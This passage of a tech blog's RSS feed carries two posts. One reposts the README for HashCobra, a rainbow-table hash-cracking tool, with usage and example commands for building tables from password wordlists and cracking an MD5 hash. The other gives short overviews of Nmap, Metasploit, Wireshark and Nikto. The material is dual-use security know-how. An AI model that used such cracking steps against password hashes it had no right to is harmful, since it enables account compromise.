<p>The post <a href="http://kostacipo.stream/hashcobra-hash-cracking-tool/">HashCobra &#8211; Hash Cracking Tool</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<p>This is hashcobra Hash <a title="Cracking" href="https://www.kitploit.com/search/label/Cracking" target="_blank" rel="noopener noreferrer">Cracking</a> tool.</p>
<p><b>Usage</b></p>
<pre><code>$ ./hashcobra -H
--==[ hashcobra by sepehrdad ]==--

usage:

  hashcobra -o &lt;opr&gt; [options] | [misc]

options:

  -a &lt;alg&gt;     - <a title="hashing" href="https://www.kitploit.com/search/label/Hashing" target="_blank" rel="noopener noreferrer">hashing</a> algorithm [default: md5]
               - ? to list available algorithms
  -c &lt;alg&gt;     - compression algorithm [default: zstd]
               - ? to list available algorithms
  -h &lt;hash&gt;    - hash to crack
  -r &lt;path&gt;    - rainbow table path [default: hashcobra.db]
  -d &lt;path&gt;    - dictionary file path
  -o &lt;opr&gt;     - operation to do
               - ? to list available operations
misc:

  -V           - show version
  -H           - show help

example:

  # Create md5 rainbow table with zstd compression from rockyou.txt
  $ hashcobra -o create -d rockyou.txt

  # Create sha512 rainbow table wit   h no compression from darkc0de.lst
  $ hashcobra -o create -a sha512 -c none -r rt.db -d darkc0de.lst

  # Crack 1a1dc91c907325c69271ddf0c944bc72 using rt.db
  $ hashcobra -h 1a1dc91c907325c69271ddf0c944bc72 -r rt.db
</code></pre>
<p><b>Description</b><br />This tool uses Rainbow tables for cracking <a title="hashes" href="https://www.kitploit.com/search/label/Hashes" target="_blank" rel="noopener noreferrer">hashes</a> <br />This makes it to be really fast and a lot faster than traditional hash cracker.<br /><a name="more"></a></p>
<p><b>Build Prerequisites</b></p>
<ul>
<li><a title="Make" href="https://www.gnu.org/software/make/" target="_blank" rel="nofollow noopener noreferrer">Make</a> is required.</li>
<li><a title="GCC" href="https://gcc.gnu.org/" target="_blank" rel="nofollow noopener noreferrer">GCC</a> 8.0 or above is required.</li>
<li><a title="Rocksdb" href="https://github.com/facebook/rocksdb" target="_blank" rel="nofollow noopener noreferrer">Rocksdb</a> most recent verison is required.</li>
<li><a title="Openssl" href="https://github.com/openssl/openssl" target="_blank" rel="nofollow noopener noreferrer">Openssl</a> most recent verison is required.</li>
</ul>
<p><b>Building</b></p>
<pre><code>$ make</code></pre>
<p><b>LEGAL NOTICE</b><br />THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY! IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT. BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.</p>
<div><b><a class="kiploit-download" title="Download Hashcobra" href="https://github.com/sepehrdaddev/hashcobra" target="_blank" rel="nofollow noopener noreferrer">Download Hashcobra</a></b></div>
<p>The post <a href="http://kostacipo.stream/hashcobra-hash-cracking-tool/">HashCobra &#8211; Hash Cracking Tool</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/hashcobra-hash-cracking-tool/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>4 Fundamental Open Source Security Tools</title>
		<link>http://kostacipo.stream/4-fundamental-open-source-security-tools/</link>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Tue, 26 Nov 2019 12:15:25 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[tools]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1378</guid>

					<description><![CDATA[<p>&#160; In the world of cyber security, there are thousands of open source security tools with both defensive and offensive security capabilities that many professionals prefer to assess systems. The following are 4 essential security tools that will help you to secure your systems and networks. These open source security tools have been given the [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/4-fundamental-open-source-security-tools/">4 Fundamental Open Source Security Tools</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<p>In the world of cyber security, there are thousands of open source security tools with both defensive and offensive security capabilities that many professionals prefer to assess systems. The following are 4 essential security tools that will help you to secure your systems and networks. These open source security tools have been given the essential rating due to the fact that they are effective, well supported and easy to start getting value from.</p>
<p><b>Nmap:</b></p>
<p>Nmap (&#8220;Network Mapper&#8221;) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. It uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.</p>
<div class="separator"><a href="https://4.bp.blogspot.com/-_c7y4ztidt4/WDQ6bhcDU_I/AAAAAAAAAhA/vWYl9-yaZ8Y3GUL0TFiD2uA5CxMdeFUmQCLcB/s1600/nmap.png"><img loading="lazy" decoding="async" src="https://4.bp.blogspot.com/-_c7y4ztidt4/WDQ6bhcDU_I/AAAAAAAAAhA/vWYl9-yaZ8Y3GUL0TFiD2uA5CxMdeFUmQCLcB/s320/nmap.png" width="320" height="248" border="0"></a></div>
<p><b><br />
Metasploit Framework:</b></p>
<p>Metasploit framework is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. Metasploit was completely free, but the project was acquired by Rapid7 in 2009 and it soon sprouted commercial variants.</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-8C7MZlXz-oo/WDQ6hi7gu2I/AAAAAAAAAhE/JOAwLJtQQXINn2OQoLlQb46EunKwVtroACLcB/s1600/metasploit_ie_xp_pfv_metafile.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-8C7MZlXz-oo/WDQ6hi7gu2I/AAAAAAAAAhE/JOAwLJtQQXINn2OQoLlQb46EunKwVtroACLcB/s400/metasploit_ie_xp_pfv_metafile.png" width="400" height="308" border="0"></a></div>
<p><b><br />
Wireshark:</b></p>
<p>Wireshark is a fantastic open source, multi-platform network protocol analyzer that allows examining the data from a live network or from a capture file on disk. It enables us to capture data and take a deep look into packet details. It also supports hundreds of protocols and media types. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.</p>
<div class="separator"><a href="https://2.bp.blogspot.com/-bJ_o0lGNUhU/WDQ6mRilEWI/AAAAAAAAAhI/oXAIbAF8kDcZbtPhzhRt-h2M9Sg--nMZgCLcB/s1600/wireshark.png"><img loading="lazy" decoding="async" src="https://2.bp.blogspot.com/-bJ_o0lGNUhU/WDQ6mRilEWI/AAAAAAAAAhI/oXAIbAF8kDcZbtPhzhRt-h2M9Sg--nMZgCLcB/s400/wireshark.png" width="400" height="107" border="0"></a></div>
<p><b><br />
Nikto:</b></p>
<p>Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. Nikto is great for firing at a web server to find known vulnerable scripts, configuration mistakes and related security problems.</p>
<div class="separator"><a href="https://4.bp.blogspot.com/-3k45N4lHPL4/WDQ6u2epvEI/AAAAAAAAAhM/k2Yj3AJ80WIGq20JHTLfWSvD2sgMxsabwCLcB/s1600/9657814_orig.png"><img loading="lazy" decoding="async" src="https://4.bp.blogspot.com/-3k45N4lHPL4/WDQ6u2epvEI/AAAAAAAAAhM/k2Yj3AJ80WIGq20JHTLfWSvD2sgMxsabwCLcB/s400/9657814_orig.png" width="400" height="225" border="0"></a></div>
<p>These security tools are well known and are updated by the providers to allow effective use. However, there are many other security tools as well which are being used by many professional as per their requirements.</p>
<p>The post <a href="http://kostacipo.stream/4-fundamental-open-source-security-tools/">4 Fundamental Open Source Security Tools</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
